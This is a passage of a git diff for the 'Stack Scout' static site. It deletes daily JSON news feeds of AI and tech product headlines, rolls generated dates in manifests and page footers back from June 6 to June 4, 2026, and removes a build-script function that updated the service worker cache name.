"2026-05-28T17:59:08.282Z", - "summary": "ElevenLabs 
introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon.", - "category": "ai_tools" - }, - { - "title": "Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit", - "url": "https://x.com/kunalbhatia91/status/2060013228231725092", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-28T17:54:34.974Z", - "summary": "Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views.", - "category": "ai_tools" - }, - { - "title": "Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era", - "url": "https://x.com/bercankilic/status/2060043312606638245", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-28T17:49:05.507Z", - "summary": "Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. 
The launch includes free home cleaning as the entry product.", - "category": "ai_tools" - }, - { - "title": "minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models", - "url": "https://paperswithcode.com/papers/2605.30263", - "source": "Papers With Code", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.9, - "date": "2026-05-29T15:24:25.298Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch systemIt maps out self-improvement methods like STaR and o1.", - "url": "https://www.digg.com/ai/xay55qwq", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.054Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio", - "url": "https://www.digg.com/ai/hsa7ykbd", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.027Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "OpenAI launches Rosalind Biodefense, giving U.S. 
government agencies access to its specialized GPT-Rosalind modelThe initiative focuses on defending against engineered pathogens.", - "url": "https://www.digg.com/ai/dl0e6ofa", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.024Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7", - "url": "https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.014Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold", - "url": "https://x.com/Mho_23/status/2048507307466658062", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-29T12:05:45.033Z", - "summary": "AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation.", - "category": "ai_tools" - }, - { - "title": "Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption", - "url": "https://x.com/garrytan/status/2052434681363321056", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-29T12:02:13.220Z", - "summary": "Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. 
The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-30.json b/data/news-feed-2026-05-30.json deleted file mode 100644 index 3ec9f9e..0000000 --- a/data/news-feed-2026-05-30.json +++ /dev/null @@ -1,243 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.837Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-30", - "article_count": 15, - "archived_story_count": 214, - "articles": [ - { - "title": "Show HN: VT Code – open-source terminal coding agent in Rust", - "url": "https://github.com/vinhnx/VTCode", - "source": "Hacker News", - "tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "importance": 0.82, - "date": "2026-05-30T03:07:25.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devicesA new profile interface tracks token activity and usage statistics.", - "url": "https://www.digg.com/ai/2cvxmdwh", - "source": "Digg AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.453Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399", - "url": "https://ouraring.com/blog/oura-ring-5", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-29T23:40:17.517Z", - "summary": "Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. 
New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399.", - "category": "ai_tools" - }, - { - "title": "Cursor Releases Developer Habits Report on AI Coding Trends", - "url": "https://www.digg.com/ai/6jh7d90b", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.474Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking", - "url": "https://www.digg.com/ai/9jzt6gwc", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.461Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Shift Launches Free NYC Cleaning to Gather Robotics Training Data", - "url": "https://www.digg.com/ai/5ol0wuf6", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.459Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing", - "url": "https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T23:40:17.517Z", - "summary": "Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation.", - "category": "ai_tools" - }, - { - "title": "Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes 
Enterprise AI Cost Controls Gap", - "url": "https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-29T23:37:37.979Z", - "summary": "An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk.", - "category": "ai_tools" - }, - { - "title": "Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'", - "url": "https://x.com/jarredsumner/status/2060XXX", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T23:37:37.979Z", - "summary": "Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' 
The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing.", - "category": "ai_tools" - }, - { - "title": "wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack", - "url": "https://github.com/wolfSSL/wolfCOSE", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9400000000000001, - "date": "2026-05-30T20:42:28.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenAI Extends Codex Computer Use To Windows", - "url": "https://www.digg.com/ai/24n5kcme", - "source": "Digg AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.94, - "date": "2026-05-30T05:18:16.464Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data", - "url": "https://www.digg.com/ai/hqutws0i", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.94, - "date": "2026-05-30T05:18:16.456Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Kore: Binary File Format Optimized for Modern Data Systems (Open Source)", - "url": "https://github.com/arunkatherashala/Kore", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8899999999999999, - "date": "2026-05-30T20:54:22.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "ChatGPT — Release Notes", - "url": "https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.", - "source": "The Verge AI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.76, - "date": 
"2026-05-30T05:18:42.413Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Show HN: Open Envelope – an open schema for defining AI agent teams", - "url": "https://openenvelope.org/docs/schema/", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.75, - "date": "2026-05-28T20:30:20.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-31.json b/data/news-feed-2026-05-31.json deleted file mode 100644 index 8ba62ae..0000000 --- a/data/news-feed-2026-05-31.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.119Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-31", - "article_count": 1, - "archived_story_count": 98, - "articles": [ - { - "title": "Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal", - "url": "https://github.com/marekkowalczyk/breathe-cli", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7699999999999999, - "date": "2026-05-30T20:30:53.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-01.json b/data/news-feed-2026-06-01.json deleted file mode 100644 index 08dc6f1..0000000 --- a/data/news-feed-2026-06-01.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.419Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-06-01", - "article_count": 5, - "archived_story_count": 220, - "articles": [ - { - "title": "Nvidia announces new AI chip for personal computers", - "url": "https://www.bbc.com/news/articles/crmp9mppvzro", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-06-01T10:33:25.000Z", - "summary": null, - "category": 
"tech_general" - }, - { - "title": "AI Agent Guidelines for CS336 at Stanford", - "url": "https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.91, - "date": "2026-06-01T16:41:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenAI frontier models and Codex are now available on AWS", - "url": "https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.83, - "date": "2026-06-01T21:50:02.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Malicious npm packages detected across Red Hat Cloud Services", - "url": "https://github.com/RedHatInsights/javascript-clients/issues/492", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.83, - "date": "2026-06-01T13:30:21.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Movwin: My (Unpublished) TUI Framework", - "url": "https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7699999999999999, - "date": "2026-05-30T01:07:42.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-02.json b/data/news-feed-2026-06-02.json deleted file mode 100644 index 48cbc39..0000000 --- a/data/news-feed-2026-06-02.json +++ /dev/null @@ -1,72 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.626Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-06-02", - "article_count": 4, - "archived_story_count": 241, - "articles": [ - { - "title": "Microsoft announces Scout, an autonomous AI agent 
built on OpenClaw", - "url": "https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html", - "source": "Hacker News", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-06-02T18:19:27.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Alphabet announces $80B equity capital raise to expand AI infra and compute", - "url": "https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-06-01T20:55:15.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "HP re-releases classic computer science calculator: The HP-16C", - "url": "https://hpcalcs.com/product/hp-16c-collectors-edition/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9400000000000001, - "date": "2026-06-02T19:02:40.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Apple rejected my dictation app for using the accessibility API", - "url": "https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.86, - "date": "2026-06-02T12:00:03.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-03.json b/data/news-feed-2026-06-03.json deleted file mode 100644 index 473709d..0000000 --- a/data/news-feed-2026-06-03.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.899Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - 
"date": "2026-06-03", - "article_count": 6, - "archived_story_count": 269, - "articles": [ - { - "title": "Ableton Extensions SDK", - "url": "https://www.ableton.com/en/live/extensions/", - "source": "Hacker News", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.8200000000000001, - "date": "2026-06-03T20:39:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Gooey: A GPU-accelerated UI framework for Zig", - "url": "https://github.com/duanebester/gooey", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-06-03T17:12:27.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Capstone – multi-platform, multi-architecture disassembly framework", - "url": "https://www.capstone-engine.org/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-06-03T01:59:46.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers", - "url": "https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8899999999999999, - "date": "2026-06-03T17:01:00.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Roku LT Operating System open source distribution", - "url": "https://blog.roku.com/developer/roku-lt-os", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.86, - "date": "2026-06-03T01:13:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Journey to JPEG XL: open-source experiments shaped 
the future of image coding", - "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6599999999999999, - "date": "2026-06-03T21:55:23.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-04.json b/data/news-feed-2026-06-04.json deleted file mode 100644 index 2931428..0000000 --- a/data/news-feed-2026-06-04.json +++ /dev/null @@ -1,86 +0,0 @@ -{ - "generated": "2026-06-04T21:49:41.031Z", - "site": "Stack Scout", - "article_count": 5, - "articles": [ - { - "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", - "url": "https://github.com/anthropics/defending-code-reference-harness", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-04T20:11:20.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Ableton Extensions SDK", - "url": "https://www.ableton.com/en/live/extensions/", - "source": "Hacker News", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-03T20:39:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Open Terminal – A Bloomberg Style App for Research", - "url": "https://tesseractanalytics.ai/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-04T15:58:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Meta's ships facial recognition on smart glasses", - "url": 
"https://www.buchodi.com/meta-glasses-facial-recognition/", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.48, - "date": "2026-06-04T19:36:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Journey to JPEG XL: open-source experiments shaped the future of image coding", - "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.48, - "date": "2026-06-03T21:55:23.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-05.json b/data/news-feed-2026-06-05.json deleted file mode 100644 index 32afd3d..0000000 --- a/data/news-feed-2026-06-05.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "generated": "2026-06-05T17:45:11.045Z", - "site": "Stack Scout", - "article_count": 5, - "articles": [ - { - "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", - "url": "https://github.com/anthropics/defending-code-reference-harness", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-04T20:11:20.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Open Code Review – An AI-powered code review CLI tool", - "url": "https://github.com/alibaba/open-code-review", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.48, - "date": "2026-06-05T00:04:29.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Meta's ships facial recognition on smart glasses", - "url": "https://www.buchodi.com/meta-glasses-facial-recognition/", - "source": "Hacker News", - 
"tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.48, - "date": "2026-06-04T19:36:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "databow: a Rust CLI to query any database with an ADBC driver", - "url": "https://columnar.tech/blog/introducing-databow//", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.48, - "date": "2026-06-02T23:11:13.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Branchless Quicksort faster than std:sort and pdqsort with C and C++ API", - "url": "https://tiki.li/blog/blqsort", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.48, - "date": "2026-06-02T20:00:54.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-06.json b/data/news-feed-2026-06-06.json deleted file mode 100644 index 842deea..0000000 --- a/data/news-feed-2026-06-06.json +++ /dev/null @@ -1,6 +0,0 @@ -{ - "generated": "2026-06-06T12:00:13.600Z", - "site": "Stack Scout", - "article_count": 0, - "articles": [] -} \ No newline at end of file diff --git a/data/news-feed-latest.json b/data/news-feed-latest.json deleted file mode 100644 index 842deea..0000000 --- a/data/news-feed-latest.json +++ /dev/null @@ -1,6 +0,0 @@ -{ - "generated": "2026-06-06T12:00:13.600Z", - "site": "Stack Scout", - "article_count": 0, - "articles": [] -} \ No newline at end of file diff --git a/data/page-registry.json b/data/page-registry.json index b3cacce..33a29ae 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-06-06", + "generatedAt": "2026-06-04", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 29ddbed..7d7a77b 100644 --- a/data/radar-manifest.json 
+++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Radar", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index 8074788..dee2917 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 21ac358..779cf1b 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index 7805e61..ec7781b 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

                  From the Stack Scout Lab

                  diff --git a/method/index.html b/method/index.html index 6a0e17f..aa83e0d 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

                  Verdict language

                  diff --git a/radar/index.html b/radar/index.html index cbc054e..4bc907f 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

                  GitHub skills ecosystem

                  diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index e4a6b8a..d390a74 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -1273,21 +1273,6 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo ` } -function updateServiceWorkerCacheName() { - const serviceWorkerPath = 'service-worker.js' - const current = fs.readFileSync(path.join(ROOT_DIR, serviceWorkerPath), 'utf8') - const next = current.replace( - /const CACHE_NAME = ['"]stackscout-\d{4}-\d{2}-\d{2}['"]/, - `const CACHE_NAME = 'stackscout-${GENERATED_AT}'`, - ) - - if (next === current) { - throw new Error('service-worker.js cache name was not updated; expected stackscout-YYYY-MM-DD declaration.') - } - - writeFile(serviceWorkerPath, next) -} - function main() { const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') @@ -1348,7 +1333,6 @@ function main() { ] writeFile('sitemap.xml', buildSitemap(sitemapRoutes)) - updateServiceWorkerCacheName() console.log( `Stack Scout build complete. Generated ${tools.length} tool pages, ${categories.length} category pages, and ${updates.length} updates.`, ) diff --git a/service-worker.js b/service-worker.js index 65ca957..9ff0fb2 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-06-06' +const CACHE_NAME = 'stackscout-2026-06-04' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index de44888..9274b4a 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

                  n8n

                  diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index d247d4c..a333ebe 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

                  SyncPad

                  diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index f810be3..3206296 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

                  Wrangler

                  diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index 34f46cc..cedcfb4 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

                  Wrangler

                  diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 437555c..8e6dee2 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

                  GitHub MCP Server

                  diff --git a/tools/make/index.html b/tools/make/index.html index 157e8cc..cb9981e 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/n8n/index.html b/tools/n8n/index.html index e546569..2b209f0 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index b717fbb..b5b70ae 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

                  Playwright MCP

                  diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index cc49f23..226bd85 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index 59e65bd..d2b6b07 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index 546b067..df9fb37 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

                  Strudel Studio

                  diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index 0d7dbc5..dbd10d1 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index 741d63b..a5b9964 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

                  Canvas Planner

                  diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 32cd6f1..2bf1dc5 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

                  Playwright MCP

                  diff --git a/updates/index.html b/updates/index.html index 63d8716..a824e2d 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

                  Wrangler 4.58.0 improved command grouping and auth ergonomics

